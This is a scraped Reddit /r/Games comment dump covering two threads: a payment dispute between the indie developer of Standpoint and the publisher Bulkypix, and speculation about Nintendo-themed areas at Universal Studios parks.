Perhaps the US law is entirely different on this, but people sue in the US for slipping on the floor - so idk. I work in design/marketing, and we've had clients go bankrupt in the past. The three times this happened, we never received *any* money (beyond the initial deposit that was paid before the declaration of bankruptcy).

I don't know exactly how the developer/publisher relationship works, but if it's even remotely similar, paying off developers is not the highest priority when divvying up assets.   Did your company sue?  Any punitive damages? We tried to go after the money for a bit, but it's important to keep in mind that we are a small firm. Extended legal action would have not only tied up our money, but it would have slowed down our pipeline and hurt our income. None of the accounts were worth dragging out the process. Which is why you don't work with random companies that can just go under at a moment's notice, and have lawyers add protections in case of the various forms of bankruptcy to the contract. Important and expensive lesson to learn... 3 times. When you're in business for over a decade and of all of your adult life, shit happens. But thanks for assuming you know how to run my business better than me. Surely I am humbled by the insights of a captain of industry such as yourself.  &gt; thanks for assuming you know how to run my business better than me

If this has happened to you three times... yeah, he does. The bank is only first to the extent it is secured or holding the company's accounts. The developer would presumably share ratably with other general unsecured creditors. That's true. But even a llc can get pierced if it's behaved badly enough  if the executives conspired to avoid having to pay, they might get sued personally.  Yeah, the sheer badness of this one might actually pay off for the developers. That's not always true. Court orders can dictate the order in which debts are resolved and to whom they are paid. Which is ridiculous.

Bankruptcy laws really should be changed so that customers, suppliers, and non-management employees are favored over permanent debt-holders. I agree completely, its very unfair. [deleted] [deleted] Please follow the subreddit rules. We don't allow low effort or off-topic comments *(jokes, puns, memes, reaction gifs, personal attacks or other types of comments that doesn't add anything relevant to the discussion)* in /r/Games.

You can find the subreddit rules here: http://www.reddit.com/r/Games/wiki/rules#wiki_rules Thank you, mod. This is why I like /r/games and why I will never step foot back into /r/gaming I thought /r/Games and /r/gaming had the same mods the only mod for /r/games that is a mod in /r/gaming is /u/Dacvak, and he's a pretty good mod, IMO. [deleted] Please follow the subreddit rules. We don't allow low effort or off-topic comments *(jokes, puns, memes, reaction gifs, personal attacks or other types of comments that doesn't add anything relevant to the discussion)* in /r/Games.

You can find the subreddit rules here: http://www.reddit.com/r/Games/wiki/rules#wiki_rules [deleted] Please follow the subreddit rules. We don't allow low effort or off-topic comments *(jokes, puns, memes, reaction gifs, personal attacks or other types of comments that doesn't add anything relevant to the discussion)* in /r/Games.

You can find the subreddit rules here: http://www.reddit.com/r/Games/wiki/rules#wiki_rules [deleted] Please follow the subreddit rules. We don't allow low effort or off-topic comments *(jokes, puns, memes, reaction gifs, personal attacks or other types of comments that doesn't add anything relevant to the discussion)* in /r/Games.

You can find the subreddit rules here: http://www.reddit.com/r/Games/wiki/rules#wiki_rules Yeah, but they have to get in a queue with everyone else who is owed money. Assets being like... office space + furniture in them? Does it include intellectual property? Assets include tangible and intangible assets. Intellectual property is certainly an asset since it can be bought and sold.  Chances are that if they are in a ongoing legal dispute there has been an injunction filed against the publisher to insure they are unable to liquidate or file bankruptcy without a judges permission.  This would be very rare, as parties frequently file for bankruptcy while - and even because - they are in litigation. Moreover, other creditors could file involuntary bankruptcy proceedings against them. Declaring bankruptcy doesn't magically get you out of legal claims.  In theory? No. In practice? Yes. You just dump the old company and open up shop somewhere else. By the time the courts have processed everything you are long gone and if you are clever you also moved all the assets that are worth something. Courts aren't morons, they're well aware of that ploy and look very dimly on attempts to pull it. I thought you still owed the money even if you declare bankruptcy. Not sure about the US but in the UK if you declare bankruptcy you wipe all the debt, but you also loose claim to any assets you have. Hey, the dev is my mate, I dunno if he'll say much more about this because of the whole legal situation but the deal sounded shitty from the start and I pointed him at an extremely good lawyer a couple of months ago.

Regardless, the main problem is.. he isn't threatening them with litigation - he would need something like 20,000 to take them to court. If he had 20,000 lying around there wouldn't be an issue. But he's the one being threatened with litigation. They gave him some money for development and now he's trying to cut his losses and go elsewhere since he never received a large chunk of the funding.

Like, I remember in last October at EGX he was concerned and had to slow down development because they hadn't paid him for his latest milestone yet and it'd been a while (to the point where he had to go get basically a full time teaching job mid development).

Now the game's released on Steam at least and.. I'm not sure if it was the same milestone they still haven't paid, but I'm pretty sure they didn't give him a significant portion of the development cost even after release. He could've at least put the rest of that money into advertising but they didn't even add him a page on their *own fucking website* in their games catalogue, let alone thinking of marketing for him.

The whole thing fucking infuriates me as well, because the deal is out-fucking-rageous. Like, even if he had gotten paid his share, I would be angry at the deal they gave him. I can't believe what an absolutely minute percentage of the money he, as the goddamn lead coder, project manager, exhibitor and lifeblood of the game would be being paid if they even actually kept the deal.

Some would say that people who prey on vulnerable devs who were unhappy and unfunded after a failed kickstarter are comparable to leeches or vultures. I reserve my opinion on that.

I just fucking hope he does well on consoles. He needs to get a lawyer on contingency.  This is an age-old problem that's been solved for a long time by contingency fee agreements. If they are doing this to them; they are doing it to other devs.  
Pool resources. Get him to give [P&amp;amp;P](http://www.purewalandpartners.com) a call. They specialise in game law and if you look at their pricing schemes this is the sort of thing they may well do on a basis of recouping costs from (what sounds like) an easy court win. Tell him to start a gofundme. I would donate whatever I can just to see those scumbags brought to justice. crowd-source lawyer fees maybe? You assumption is that it is outside the prevue of their publishing agreement to do with they did. You need to pay lawyers tho. And you do it without having a dime. And you can always lose. That's an impressive way to fuck yourself legally and completely trash your reputation in one swing. 

Kind of surprised this is the first i've heard about it. Hope the developers get the money they are most certainly deserve and more.
 If you look at bulkypix's website, most, if not all, of their games are shovelware. I wonder if they've pulled this same stunt with other small devs that weren't brave enough to come forward. Ala "for the exposure"  &gt;  Ala "for the exposure" 

Ah the go to excuse for people wanting free labor.

All fun and games until 

&gt; Lawyers have drafted their termination letter

Someone files a legal dispute. Only outmatched by great work experience opportunities.  &gt; completely trash your reputation in one swing.

Absolutely. As a dev, I now have a very definite entry in my 'do not ever do business with these guys' list I've worked for some time with BulkyPix now, and we've had a great experience with them. We were even planning on wiriting a blog about it before this situation surfaced, just haven't had the chance.

I'd wait for the negative hype to fade off before you add them to such a list. Even the developer said, they aren't evil, and disagreements happen. Note: I had a previous thread on this that was visible on the front page of r/games, but the publisher had not stated who exactly was to blame at that point, and I made a poor leap in logic as to who was the publisher based on comments. I messed up and I'm sorry. Plug-in Digital is not the publisher, Bulkypix is. The old thread was deleted so unjustified hate wasn't sent Plug in Digital's way. Bulkypix is pretty small it seems. Roughly 20 employees, most of which are former Vivendi Mobile employees apparently.

Edit: Here's what purports to be a partial listing of stuff they've published: https://thinkgaming.com/app-sales-data/publisher/190/bulkypix/ &gt;La Abeja Maya: The Ant's Quest---	$185.99	

the shit Probably meant to be a different currency. Click through, just a bug. Hehehe... Ant's Quest... bug... If that's pesos it's like $12 so maybe that That title makes no sense, considering *abeja* in Spanish means "bee."

So it's called *Maya the Bee: The Ant's Quest* (I'm assuming it's named after the cartoon; it could also be translated "The Mayan Bee"). Could be the protagonist is Maya the Bee and the Ant is the quest giver. Fun story.

I'm a french dev fresh out of university and one of my first interview for an internship was for bulkypix. (About 3 years ago)

They pretty much wanted an intern who could dev iphone games by himself with 0 help and no coaching. And all that for the worst wage possible (400/month at the time so about 500Dollars) Dafuq even without a degree you can get wages like that. Bear in mind it was for an internship ^^ But usually what you lack in wage you make it up in experience gain ! Here they wanted the intern to already know how to optimize an iphone game. It's different for CompSci interns afaik, at least in the States. Internships in that (mine and yours) field generally pay a wage reasonably above minimum wage. So $500/month would be great for another field's internship, not considering other requirements and benefits, but for this specific field it's terrible.  Maybe it isn't comparable, but I was at a web dev internship for 6 months, and my superiors were fairly hands-off for the whole of it. 

The project they had me working on was just a reimplementation of their older software in a more modern platform, but still, besides them explaining the business logic to me, they never really gave any "coaching" or direct help in developing the system. Then again, the project itself wasn't an urgent one at all, so I didn't have a strict deadline breathing down my neck.

I thought that was pretty standard and relatively fair. I already knew how to code in general, and what I didn't know I could google out for myself.  I hear you and in the concept i agree with you !

The problem is that this is what they asked for during the interview. Making it clear that what they wanted was cheap labor and not for you to gain meaningful experience. (Which is kind of the point of an internship.)  Appreciate the correction :) [deleted] Is there any word or announcement from the publisher about this whole situation yet? All the news and information is coming from one side only.

This is a VERY shitty thing to do and the publishers sound very shady and definitely to be avoided.

I hope the developer gets this resolved quickly and is able to recoup the payment that they are owed from the publisher. Three tweets, essentially that they weren't responsible for the bundle (so who was?) and that they're working to correct the 'misunderstanding'.

www.twitter.com/BulkyPix Yeah I can see this echo chambering. Don't go thinking they're evil. Some people have had success with them! Disagreements happen!  So, what are you thinking your next game would be? We're working on something already in between preparing the xbone standpoint release. It's called WarpBall, but it's not the game on our website (that's being renamed to warp ball classic/arcade)  Ah nice! You guys seem to like making arcade style games haha. Best of luck! Sorry to hear of your nightmare, hopefully nothing like this happens to me.  There's more to this than what we're seeing. Never rely on one side of an argument to make a judgment. This should be up-voted.  It's very important people maintain some skepticism.  I'm trying to be balanced, but I'll inevitably be biased. I really respect you for that position. I am going to remember this and make sure to buy your next game, as directly from you as possible. Oh wow, this sounds...familiar.

Back in 2007, I was studying Computer Games Tech at university and ended up getting a work placement at a little mobile games publishing company.  I won't name names but they are defunct now. The reason why is as follows...

Remember that the mobile landscape in 2007 was very different to today. Android was but a glimmer in Google's eye and the iPhone was still mostly rumour and conjecture at this point. Back then, everyone had Nokias (At least in the UK, where we were based), some had windows mobile and then there were a smattering of other platforms (like "Brew" or UIQ, which is basically Symbian) and all sorts. 

Mobile "games" were often cheap ripoffs of bigger titles, as if the 80's never really left us. They all had stupid names, like "Super Taxi Driver 2000!" (which looked remarkably like Crazy Taxi) and "Mega Stealth Deluxe" (Which looked a bit like Metal Gear Solid). Nearly always they were made by little 2-3 men teams, bedroom programmers from all over the place - spain, russia, etc.

The company I worked for was a publisher and made quite a bit of money from publishing these games. They'd offer the little bedroom duo's a great deal, publish their games in markets worldwide (They had big a presence in the UK, Spain, Korea, Finland, you name it) and had great ties to the carriers, so would often get good exposure on their mobile sites. Seemed like a great opportunity to make mucho money.

And they did, sort of. At least, they sort of did and didn't. See if they sold say 50 copies of a title in Korea, digitally via a carrier portal, how exactly would the little bedroom team know? You'd have to take the publishers word on it. So if the publisher says they sold only 10 or 5, or even none at all, you couldn't really do much about it. 

So basically, they screwed over these little indie developers left and right. A lot of them just accepted it was the nature of the business. I guess some were oblivious. Either way, this publisher got more and more brazen. They didn't just outright lie about sales, they sometimes just didn't pay developers at all. Who cares about them, right?

One day, a little spanish dev team didn't get paid. It was business as usual, nobody had heard of them and nobody cared about them, fuck them, what are they going to do?

Except it turns out this little spanish team wasn't a little team at all. In fact, it was none other than Namco operating under a different brand for their mobile titles. Oops.

Namco weren't happy. Like, really not happy. In a matter of weeks, most of the publisher and their entire in-house studio was laid off. I ended up looking after their entire source assets, a not-even-student-graduate who had no idea what he was doing. The company quickly went under and all of the assets got bought out by another company, which was seemingly run by the same people. Some years later, that company went under as well, I think. No doubt resurrecting as something else.

When I read this story, I genuinely suspected that this might be the same people, doing the same shady deals. I Can't find enough info on this company to confirm, the only thing I can tell is that Bulkypix is based in France whereas this company was all UK based. We're all advocating for Vathan (the dev) to get this sorted out here at IndieGameStand, we've never had something like this happen and it just sucks for everyone. 

 Lets tally up the legal problems now facing the publisher. Breach of contract, specifically breaching conditions, dissolving the contract entirely because of their non-payment. Then they put the game on an unauthorized sale which meant not only did the developer lose out on potential customers but also the publisher themselves make a quick buck since they weren't paying originally. If the dev's lawyer is anyway decent and I mean if he is able to put his trousers on correctly he will not only get all of the money before this sale but for the losses in earnings because of the $1 sale they will get not just their cut from that but the cut which they would have gotten from the game at full price. In general the dev should be fucking delighted the publisher were this fucking stupid, I know I got a giggle looking at the post.  &gt; specifically breaching conditions, dissolving the contract entirely because of their non-payment

we don't actually know what the contract specified regarding payments as we do not have the contract

&gt; Then they put the game on an unauthorized sale

we don't actually know if they needed authorization for such promotional activities as we do not have the contract

&gt; not only did the developer lose out on potential customers

no they may have lost out on *revenue*

seriously guys let's not jump to pitchforks on the basis of one side's story and none of the information needed to judge the situation. maybe the publisher did breach their contract. Maybe the developer misunderstood the terms. Who knows. I need to clear this up. Putting the game in the bundle DOESN'T need our permission contractually. The lack of communication + knowing we were in a dispute meant that seeing the game up was a nasty panicky shock. 

We both aren't happy with some actions of the other, thus legal dispute. Not saying we're perfect, but they're contractually at fault at the moment. Non-payment has however breached the contract which is now dissolved. (as of tomorrow's date. Law crap) 

I would advise no pitchforks. I see a lot of people thinking bulkypix are evil. They're not, we're just disagreeing. It happens.

 Huh, you seem pretty level headed. Thanks for jumping into the thread and clear things up! I hope you guys get your money. I had a full day of panicking. If you follow my comment history you can probably track my emotional state calming down :p Is there a way for gamers to support you and your game directly? &gt; I would advise no pitchforks. I see a lot of people thinking bulkypix are evil. They're not, we're just disagreeing. It happens.

I'd say disagreeing and non-payment are pretty different. They're basically stealing your work, and you say it's just a disagreement.

Depending on the amount you could go to small claims court which doesn't require a lawyer (at least not in my country). It will be pretty straight forward if you have the signed contract and/or other communications implying a contract has been signed. I've sued someone for $6k like this and won, and although small claims court has a limit on how much money you can sue for, any money is better than nothing. Getting a settlement during this process is even better, because it would mean they cannot appeal.

 He's probably simply not discussing the details because there is no need for anyone outside of the matter to know. He gains nothing from giving the details, and everyone should respect and understand he has no obligation to do so. &gt; Putting the game in the bundle DOESN'T need our permission contractually.

It's still an asshole move to put it up without even noticing you. And doubly so if you have a conflict with them. Very much so, but I'm sure the specifics of the contract matter very much when it comes to claiming damages and payment in the legal dispute. [deleted] Please follow the subreddit rules. We don't allow low effort or off-topic comments *(jokes, puns, memes, reaction gifs, personal attacks or other types of comments that doesn't add anything relevant to the discussion)* in /r/Games.

You can find the subreddit rules here: http://www.reddit.com/r/Games/wiki/rules#wiki_rules [deleted] Please follow the subreddit rules. We don't allow low effort or off-topic comments *(jokes, puns, memes, reaction gifs, personal attacks or other types of comments that doesn't add anything relevant to the discussion)* in /r/Games.

You can find the subreddit rules here: http://www.reddit.com/r/Games/wiki/rules#wiki_rules [deleted] Please follow the subreddit rules. We don't allow low effort or off-topic comments *(jokes, puns, memes, reaction gifs, personal attacks or other types of comments that doesn't add anything relevant to the discussion)* in /r/Games.

You can find the subreddit rules here: http://www.reddit.com/r/Games/wiki/rules#wiki_rules [deleted] [deleted] [deleted] [deleted] Are you a lawyer, or are you just making shit up wholecloth? Business manager but I studied law. I wouldn't be surprised if there was fraud somewhere in there, conspiring to avoid payment and never intending to pay in the first place.

It sounds like the dev wants to sue but doesn't have money up front so thinks he can't.  I hope someone gets the word to him about contingency fee agreements and other methods. &gt; Anyone who wants to buy a copy of the game in this sale: PLEASE DO! Your enjoyment is more important to me than our profits &amp; our legal issues shouldn't impact you guys. Odds are that we'll recover enough to make our next project, and that's all that matters really.

This is the side of software/game development that I love. Most of us do what we do so people can enjoy it, not to try to suck money out of users.

That said, these guys sound great and I hope the publisher gets screwed over for pulling this on them. I'm not sure if any of you can shed any light on this subject but here goes. 

If I am an indie developer that's releasing something like Standpoint, what sort of contract do I sign with a publisher with regards to financial compensation? What percentage of sales do I get? Is it from gross or net revenue? How do most developers ensure that they are paid? Lastly, what is the most reasonable result of this specific kind of dispute? Do many publishers just declare bankruptcy or can they just dodge forever?  I suggest asking over in /r/gamedev instead, they are super helpful! I can't answer your questions but absolutely have a lawyer look over any paper that a publisher wants you to sign.  Oh for sure. If I was developing a game, I would. I'm not. Just curious.  A lot of your questions will be very specific to your particular contract and any conditions and specifics such as you mentioned will need to be specifically spelled out in the contract. I would highly advise against signing any contract that doesn't have enough specific answers to exactly these sorts of questions. Contracts are not the place for ambiguity and you still would have these sorts of questions after receiving a contract, I would advise not to sign it. I think much of what he's asking are what the going industry standards are. I don't really think there are any going standards to these sorts of questions. Maybe I should have made it clearer in my response, but stuff like 'percentage of sales' will vary wildly from contract to contract, depending on exactly what extent of work the publisher is doing and how much resources they would need from their side.

Also something like 'dispute resolution' will be very specific to a particular contract, there isn't really a 'standard' for this sort of thing. As much as I like a good pitchfork rally, why not just let the law figure this one out? This really fucking blows for the developer. Bulky Pix isn't a company I would expect to do such a thing. A lot of their catalog is shovelware, but they have published some of the most solid games on mobile like Yesterday, Nihilumbra, Bardbarian, and Dead Effect. So, I would presume that it isn't like they're hurting financially to the point where they couldn't pay the devs. The publisher Bulkypix issued a statement, once again reassuring me that you should wait for a response before making an oppinion.

https://twitter.com/BulkyPix/status/603476411882577921 [**@BulkyPix**](https://twitter.com/BulkyPix/)

&gt; [2015-05-27 08:22 UTC](https://twitter.com/BulkyPix/status/603476411882577921)

&gt; BulkyPix NEVER agreed to put Standpoint in a $1 deal. We NEVER sought to intentionally harm or abuse Standpoint's developers.

----

^This ^message ^was ^created ^by ^a ^bot

[^[Contact ^creator]](http://www.np.reddit.com/message/compose/?to=jasie3k&amp;amp;subject=TweetsInCommentsBot)[^[Source ^code]](https://github.com/janpetryk/reddit-bot)
 It's a little confusing, though. If neither the publisher nor dev agreed for it to be in a bundle...who did?

There's also their follow-up tweets:

&gt;We ALWAYS ask studio permission before putting their game in bundles - and we're all the more vigilant about that w/ recently released games

...

&gt;It seems like there has been been a misunderstanding with one of our partner on this. We're trying to sort eveything out as we speak. Now that it's apparent that the publishers are also confused by this can we have a Misleading Title flair? The title paints this as malicious actions when it's so far appearing to be a mixup of some sort. I think this is the trailer of the game:

[Standpoint](https://youtu.be/BlhSuG9Rg4U)

That constant visual static or jerking really bothers me. For what I saw in that clip I think $13 is way too much. Are they devs sure people have actually bought the game?

Judging by their discussions area on steam it seems like no one is playing this game.  &gt;Are they devs sure people have actually bought the game?


&gt;Judging by their discussions area on steam it seems like no one is playing this game.

That seems unnecessarily mean. Obviously people bought it. The devs should get paid for their work, no matter how small the profit.  Devs don't get a cut till the game pays back normally. If it did not sell well they could have gotten nothing but the advance. We don't know what happened though.  It sounds like the devs didn't even get the advances they were due under the contract. One of vethan's friends posted about it somewhere in this thread. Trailers are usually created by the publisher. Thats really odd, I would guess the developer would be much better at making a trailer for their game. It's really hard to make good trailers. Just because you know your way around transformation matrices doesn't mean that you're good at cutting a video. And just because you're the publisher doesn't mean you know what makes the game worthwhile and fun playing and succeed at making interesting trailers. Good example Gameforge. Big publisher, horrible trailers and teasers. They should, that is literally their job and role as publisher.  I'd imagine publishers have big input in it in big games, as publishers do a lot from marketing standpoint. But for small titles probably 95% is dev work Ick, yes, that trailer did a very good job of making me never want to play that game. I was mildly nauseous 20 seconds in. Its only 30 seconds long.... So? Why should I finish something that's making me mildly nauseous if I don't have to? It's their job to make a good trailer, not my job to put up with a bad one. I think he means it took you until the end to become "mildly nauseous" so it can't have been that bad. Generally it's used to exaggerate how bad something is.

"Couldn't finish the trailer I was nauseus 2 seconds in" etc. https://www.youtube.com/watch?v=nYSsfR8TYGQ

Here is a better impression of how the game plays. Looks like a pretty damn cool arcade game. I would pick it up for $1.  Hold on a second.  Steam takes 30 days to pay.  If Bulkypix also takes 30 days to pay they are not even outside the scope of making proper payment.

Also the deal probably allows Bulkypix to bundle this game.

Also Standpoint only made like 1.5k on Steam in March, so I guess they could goto small claims court if they want, but Bulkypix probably still has time to pay. Based on other comments, it seems they never paid for milestones, either.  Common practice in this sort of relationship is to pay a certain amount up front to kickstart development, and then pay a certain portion of the total for certain milestones.  Failing to pay development milestones is an entirely different beast from not paying the revenue from sales. Yeah, profit amount from recent sales are tiiiny.  But that doesn't mean they get to stop paying us what's been promised e.t.c. Exactly. The milestone thing is what really bothers me. I was going to buy the game this morning.  Glad I didn't now.  It will sit on my wish list until this matter is sorted out. As I've been saying to everyone, buy it anyway, this will get resolved in an appropriate way! usual story, devs are the awesome guys who make their games out of passion, and publishers are the ones who stomp said passion down if its in the way of a release date or profit margins You become a developer because you care about creating things.  You become a publisher because you care about money. Stop posting smart ass shit. The world isn't as black and white as you'd like it to be.  [deleted] [deleted] [deleted] Please follow the subreddit rules. We don't allow low effort or off-topic comments *(jokes, puns, memes, reaction gifs, personal attacks or other types of comments that doesn't add anything relevant to the discussion)* in /r/Games.

You can find the subreddit rules here: http://www.reddit.com/r/Games/wiki/rules#wiki_rules nice cherry picking Please follow the rules, you have been given a warning.

Just because you see a bunch of rule breaking comments does not mean we allow them, in most cases the spam filter missed it but we might miss comments like that too or we simply didn't see them yet (for example if a comment has just been posted or if it's far down a comment chain). Hundreds of comments come in every single hour and moderators have to keep an eye on 20/30 threads at any given time. It's a lot more complicated and time consuming than you think. Dear lord... There is no distance I would be unwilling to travel if I was able to ride on a life size Rainbow Road.  But it has to have all rainbow-road music tracks while waiting in line so everyone's nostalgia is fed. And make it a dark rollercoaster like Space Mountain. Damn, that would allow for some seriously cool visual effects to make it feel like the rainbow road. I would Include a section of the track that simulates a "shortcut jump" off the road. This would be such an enormous money maker But it only takes the shortcut sometimes. And is much less forgiving when you fall off. It tries every time. It only makes it like 15% of the time. If anyone is alive after the first failed attempt, it tries again three more times before rage quitting  Then you'd just need to ride it multiple times...! [deleted] [deleted] [deleted] [deleted] [deleted] [it should play this](https://www.youtube.com/watch?v=z8cz-90n6iE) [deleted] They're making profit again (already.)

I love how some people thought Nintendo would go under.  Nintendo will never go under while it still has the nostalgia factor. Nostalgia will only take you so far (about as far as Omega Ruby/Alpha Sapphire sales, perhaps...), the fact is Nintendo had a strong software year with Mario Kart 8 (kept alive with its DLC packs) and Super Smash Bros, as well as the runaway success of Amiibo, which itself has more to do with character/brand recognition than pure nostalgia.  It's not like Nintendo is the only developer to pump out successful sequels either. I mean how old is Call of Duty now, or Battlefield. I think it just comes down to the fact Nintendo produces incredibly polished titles with fun gameplay.  You could argue that one of the main reasons those series' do so well is nostalgia and recognition of characters like Mario, link, etc. I think that's less to do with nostalgia and more to do with them being an already established brand. Customers have a pretty good idea of what they're getting. I guess there's some overlap between these two concepts but I think it'd be wrong to call it nostalgia. Yeah, my little brother is only 15 and loves pokemon and zelda. And my 19 year old sister loves mario. It isn't just the old vanguard who loves nintendo games, they pass on that love to the younger people. Nostalgia would apply to replaying old games. The continued success of these franchises is more brand recognition than anything else. More akin to how Halo is always successful or the Call of Duty franchise.  Nostalgia isn't the only reason. They keep reinventing the franchises so that subsequent generations can play them. 

Are you putting a WiiU infront of your 8 year olds, or are you giving them PS4 w/ Bloodbourne? Of course its the WiiU, which has games the entire family can enjoy.

And the 3DS dominates the handheld market. 

Yes Apple devices sell like mad, and there's a market there for $0.99 games... but generally speaking, they're HORRIBLE gaming experiences overall. 

Nintendo doesn't need to be Apple. Nintendo needs to be Nintendo.  Thing is, Nintendo doesnt rely on nostalgia, Nintendo makes their products to induce nostalgia. I mean stuff like the Throwback Galaxy, or that A Link to the Past themed level in new super mario bros, or the constant reuse of older tracks in the Mario Kart series, or the use of old, almost forgotten characters in Smash Bros.

Nintendo knows how to play into nostalgia, instead of nostalgia being just a coincidence. Or that, you know... those games are actually really good. Plus Nintendo doesn't fuck with what works, and those games have a lot that works well, they're just good fun games. They also have mobile games with a hard cap on in app purchases, too. I really like that method, it draws a clear line in the sand. I feel like an idiot for thinking Nintendo was going to make a Universal Studios game. Completely misinterpreting the title of the thread... Well there was an exclusive Universal Studios game on GameCube.... It was awful.

https://www.youtube.com/watch?v=UVf9-wEzGvc Gag. I wouldn't call it a game so much as a trash pickup simulator. Oh wow this is kinda hilarious!  Like, you imagined them doing a Universal themed Roller Coaster Tycoon style game for 3ds or something?  I'd play it.  Hell, if they're partnering with Universal to make Nintendo themed rides, they might as well take the opportunity and try to get the RCT game going as well! [deleted] [deleted] [deleted] Which Rainbow Road theme are you referring to? I think the average reddit user has a soft spot for the Mario Kart 64 theme, but I could be wrong.

The SNES theme on the other hand gets
me teary eyed just thinking of the euphoria I had on that track as a child. Those were the golden years.. When they remixed the N64 tune for MK8, I couldn't turn off the song. It sounds *that good.* I'd say the F-Zero X Expansion Kit version of Rainbow Road is the best one. The SNES one is the one I always think of. The N64 one was good, but they kind of had a down turn after that. I haven't played the really recent ones to see if they are any good though. [deleted] I'd be less willing to ride such a thing if it was Rainbow Ride with the frantic bluegrass music. ["Nintendo not making a new park, but seemingly an area dedicated to Nintendo characters in existing Universal Studio parks."](https://twitter.com/mochi_wsj/status/596225968915677184) Yeah, this is what I am expecting. In Florida, for example, there is the "Islands of Adventure" park that includes Harry Potter's World, Jurassic Park, a Marvel Comics land that was built before Disney bought Marvel and thus there isn't any Marvel stuff at Disneyworld although there is some at Disneyland because there was a loophole in the contract, a Doctor Seuss-land, etc. I'm guessing that Nintendo will end up being another "land", likely there and in Osaka (thus allowing them to hit their two biggest markets). 

In fact, one thing that I'm wondering: there have been rumors in the past that Disney is trying to buy back the rights to Marvel theme parks in Florida. If that were to happen, Universal would obviously have to close their Marvel portion... which would suddenly leave a ton of empty space that Universal would need to fill. Hmmm... I'm hoping it also absorbs the Toon Lagoon portion, that part is pretty stale and would give the Nintendo part of the park a ton of room. Turn the Popeye white water rafting into Pokemon snap... turn Dudley Dooright log flume into DK mine cart... Turning a Popeye ride into a Nintendo ride would be hilarious, given the origins of Donkey Kong. Uh, Elaborate? Donkey Kong was originally supposed to be a licensed Popeye game &gt;At the time, Nintendo was also pursuing a license to make a game based on the Popeye comic strip. When this license attempt failed, Nintendo took the opportunity to create new characters that could then be marketed and used in later games. Miyamoto came up with many characters and plot concepts, but he eventually settled on a love triangle between gorilla, carpenter, and girlfriend that mirrors the rivalry between Bluto and Popeye for Olive Oyl. Bluto became an ape, which Miyamoto said was "nothing too evil or repulsive". He would be the pet of the main character, "a funny, hang-loose kind of guy."

http://en.wikipedia.org/wiki/Donkey_Kong_(video_game) Yeah, Toon Lagoon is my least favorite section of IoA. :( I still like it.  Dudley is a good ride and I enjoy the comic theme. A theme park of Nintendo Land, Jurassic Park, and Harry Potter would be absolutely amazing. The Jurassic Park exhibit is still fucking fascinating. I can't wait to see what they do with the new movie coming out.  They are absolutely expanding the JP section. Saw a bunch of JP style electric fencing being put up behind a walled off section about a year ago. Went there back in 2005 when I was in 3rd grade. As a huge Jurassic Park fan, it was the shit, even back then. I took a good picture of kids staring straight up a dinosaurs ass in those little viewthings. There is entertainment for all age levels. 

http://i.imgur.com/VHmQdn5.jpg Yep, check out [this](http://www.themeparkinsider.com/flume/201502/4419/) to see what kind of video game attractions have already been to Universal Japan This makes so much sense because nowadays, adults who are having children have grown up with Nintendo (and Sega) and that childhood memory might even trump Disney for many.

So this should be fun for the parents that can look forward to going to these parks as well as going for their children.

I just worry about Universal theme parks because they are already mega-popular as-is, and I can only imagine Nintendo attractions making the overcrowding problem even worse. So I hope they are planning to appropriately expand their parks or shuffle around the attractions accordingly.

Fun Fact: Universal Studios sued Nintendo in 1983 due to Donkey Kong sounding too similar to King Kong.
 That childhood memory certainly trumps Disney for me. I was born in 1984, and have probably been playing Nintendo since like 86-87. I grew up with the Video game industry. Mario passed Mickey as the most recognized character world-wide several years ago as well. In 1990, actually. Well shit that was quick. I have no interest in Disney Land, but I will drive thousands of miles to go to NintendoLand! &gt; 
&gt; 
&gt; Fun Fact: Universal Studios sued Nintendo in 1983 due to Donkey Kong sounding too similar to King Kong.

Yep! And Howard Lincoln, NOA's chairman emeritus, had his first involvement with the company because he defended them in the trial.  This is actually incorrect, IIRC. Howard Lincoln *was* Nintendo's attorney and, despite initially wanting to settle for $6 million, he did make the decision to fight the claims after discovering similar cases where the "infringer" had not been sued.

Lincoln, though, did not defend Nintendo in court. He chose **John Kirby**, who had won similar cases for Pepsi Co. and Whole Foods, to defend Nintendo. Kirby won the case by pointing out that Universal Studios had declared King Kong to be in the public domain.

It is rumored that the Nintendo character Kirby was named after John Kirby and his victory.

**TL;DR**: Lincoln made the decision to fight the claims but he chose John Kirby to defend Nintendo in court, where he won. John Kirby was also given the exclusive rights to name sailboats "donkey kong" as a thanks :v He delivered one hell of a legal smackdown.  He managed to prove that Universal had no legal rights to the King Kong character.

It sent a huge message to potential lawsuits.  Nintendo will fight hard, win, and make sure you regret suing them if you try this bullshit. Ah, so while Lincoln was Nintendo's lawyer, he hired somebody else to do it.  Exactly. He knew Nintendo could win(which is why he chose to fight) but he knew this battle meant Nintendo was becoming a big thing and so, he naturally chose someone with more expertise in the area to secure the victory. &gt; Kirby won the case by pointing out that Universal Studios had declared King Kong to be in the public domain.

... How did it make it to court with that little tit-bit, then? It seems like the first thing a judge would do is look up whether the plaintiff actually owns the rights to something they're trying to sue someone over... Universal theme parks have really kicked butt with their dark rides and overall theming with their parks. What they lack is crowd management, line management (their version of fast pass is a joke), lockers (Complete mess at harry potter), and customer service (compare their employees to Disney cast members). Those points are all something they can learn from Disney.  I think Nintendo attractions would actually make the crowding better.  They need to split the crowds away from HP. Awesome! 

Some ideas: 

* a life-size Peach's Castle from Mario 64 with restaurants or shops in the rooms of the paintings

* a life-size Starfox simulator 

* some sorts of themed real life minigames (they'll do that for sure)

* include an individual pokemon at every stand as a price so you can catch them all (I know, that's evil)

* real life Splatoon with modified paintball weapons

* kart racing tracks that resemble classic tracks from you know what

* a Fatal Frame themed haunted house with AR stuff and equipment for your personal heart attack

* Donkey Kong in a frozen banana stand



There is just so much you could do!!! ^^^but ^^^they ^^^won't If all those rides &amp; attractions you suggested were included and more, I'd rather Nintendo just made their own theme park altogether. They've done it before with Pokemon after all. They don't have any of the knowledge though. Universal already does and Universal is already a destination for tourism. It's a good fit IMO.  Yeah just look at how popular the Harry Potter park is. Take a very successful IP and combine that with a popular tourist attraction and a company who is good at developing parks and you have a recipe for success.  The Harry Potter sections of Universal were VERY well done too, which is incredibly encouraging for Nintendo Land. Yeah. When I heard this, I immediately thought of a Nintendo-esque ToonTown within a Universal park.  Yeah own theme park would be great, no time limited things like the anime attractions at Universal these months. I almost considered sneaking a trip to Japan just to go there, but never got around to it... The one in Osaka? I was there but there were too many people. It was all 4D rides though. [deleted] [deleted] [deleted] &gt;* a Fatal Frame themed haunted house with AR stuff and equipment for your personal heart attack

Since it's Nintendo that would be Luigi's Mansion. [deleted] [deleted] &gt; Donkey Kong in a frozen banana stand

